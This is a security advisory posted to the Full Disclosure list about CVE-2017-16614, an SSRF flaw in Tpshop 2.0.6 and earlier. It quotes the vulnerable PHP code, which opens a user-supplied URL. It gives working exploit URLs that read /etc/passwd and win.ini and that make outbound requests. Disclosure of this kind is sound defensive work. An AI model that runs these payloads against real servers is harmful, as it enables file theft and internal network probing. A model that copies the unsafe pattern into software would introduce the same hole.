# SSRF(Server Side Request Forgery) in Tpshop <= 2.0.6 (CVE-2017-16614)
The Tpshop open source mall system is a multi-merchant mode mall system developed by Shenzhen Leopard Network Co., Ltd.This system is based on the Thinkphp development framework. ## Product Download: http://www.tp-shop.cn/Index/Index/download.html ## Vulnerability Type:SSRF(Server Side Request Forgery) ## Attack Type : Remote ## Vulnerability Description Tpshop’s former version 2.0.6 is vulnerable to SSRF(Server Side Request Forgery) in the fBill parameter within the "/plugins/payment/weixin/lib/WxPay.tedatac.php?fBil=" path. This vulnerability can lead to arbitrary files reading, network port scanning,information detection, internal network server attack. The vulnerability code: if($_GET['fBill'] && $_GET['WxPayDataBase']) { header('Content-type: image/jpeg'); $handle = fopen($_GET['fBill'], 'r'); fseek($handle , $_GET['WxPayDataBase']); fpassthru($handle); } ## Exploit http://tpshop_path/plugins/payment/weixin/lib/WxPay.tedatac.php?fBill=file:///c:/windows/win.ini&WxPayDataBase=test modify the above fBill parameter,example: request http protocol: fBill=http://www.google.com request https protocol: fBill=https://www.google.com request ftp protocol: fBill=ftp://www.google.com file read:fBil=file:///etc/passwd or fBil=file:///c:/windows/win.ini ## Versions Tpshop <= 2.0.6 ## Impact SSRF(Server Side Request Forgery) in Tpshop before version 2.0.6 allow remote attackers to arbitrary files read,scan network port,information detection,internal network server attack. ## Credit This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC) ## References CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16614 [email protected] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
